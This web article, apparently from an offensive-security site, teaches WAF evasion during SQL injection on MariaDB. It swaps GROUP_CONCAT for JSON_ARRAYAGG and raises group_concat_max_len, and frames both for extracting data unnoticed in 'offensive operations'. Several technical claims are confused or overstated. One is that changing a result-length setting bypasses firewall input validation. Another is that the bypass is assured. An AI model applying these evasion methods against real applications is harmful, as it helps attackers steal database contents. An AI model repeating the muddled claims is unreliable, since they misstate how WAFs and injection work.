Group Concat Alternative

Context

This article explains how to bypass Web Application Firewalls (WAFs) by employing alternatives to the GROUP_CONCAT function in MariaDB during SQL injections. The reader is expected to have foundational knowledge of SQL query structures, database functions, web application firewalls, and specific techniques for bypassing MariaDB WAFs.

Theory

WAF Evasion Techniques

Web Application Firewalls are designed to detect and block malicious requests. However, they often rely on pattern matching and may not recognize alternative query structures. These evasion techniques focus on identifying and exploiting weaknesses in WAF filtering rules by crafting SQL queries that avoid triggering these patterns.

MariaDB Specific SQL Injection Methods

MariaDB, like other databases, has specific ways it processes SQL queries, providing potential injection points. Techniques tailored to MariaDB involve understanding its query parsing and execution nuances, which can be leveraged to insert malicious SQL code that bypasses standard WAF defenses.

Alternative Aggregation Functions

Instead of using GROUP_CONCAT, which is often flagged by WAFs, alternative aggregation functions can be used to achieve similar results. The goal is to bypass WAF rules while still retrieving concatenated data from the database.

JSON_ARRAYAGG Function

The JSON_ARRAYAGG function is a powerful alternative that returns a JSON array of values. This function typically bypasses WAF rules that are designed to intercept GROUP_CONCAT patterns. The use of JSON_ARRAYAGG allows attackers to aggregate and extract data without triggering WAF defenses, exploiting less scrutinized parts of the SQL syntax.

Symbol Bypass Techniques

Symbol bypassing involves using alternative syntax or symbols to craft SQL queries that are not caught by typical WAF detection patterns. This method leverages creative query design to circumvent standard filter logic, which often relies on specific keyword detection.

Practice

Using JSON_ARRAYAGG for WAF Bypass

To bypass WAFs using the JSON_ARRAYAGG function, follow these steps:

  • Execute the following SQL command to aggregate data from a target column:

    SELECT JSON_ARRAYAGG(column_name) FROM table_name;

    This command will collect and return the values in a JSON array format, potentially bypassing WAF detection.

  • Before executing this command, ensure the MariaDB version supports the JSON_ARRAYAGG function to avoid compatibility issues.

Outcome

By using JSON_ARRAYAGG, you can successfully bypass input validation checks performed by WAFs, extracting concatenated data without alerting the firewall.

Adjusting group_concat_max_len

For scenarios where GROUP_CONCAT is necessary, modifying the maximum length setting might help bypass restrictions:

  • Temporarily increase the maximum length limit for GROUP_CONCAT results with:

    SET SESSION group_concat_max_len = 1000000;

    This command extends the length limit of results, allowing for larger data aggregation in a single query.

  • Execute the modified GROUP_CONCAT query:

    SELECT GROUP_CONCAT(column_name) FROM table_name;

    This will provide the concatenated result within the increased length boundary, potentially slipping through WAF filters.

Outcome

Adjusting the group_concat_max_len parameter allows for bypassing WAF input validation that restricts data length, thereby facilitating the extraction of more information in a single operation.

Tools

  • MariaDB Client
  • SQLMap

With these techniques, skilled practitioners can employ less common SQL functions and configurations to achieve successful WAF bypasses in MariaDB environments, enhancing the effectiveness of their offensive operations.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.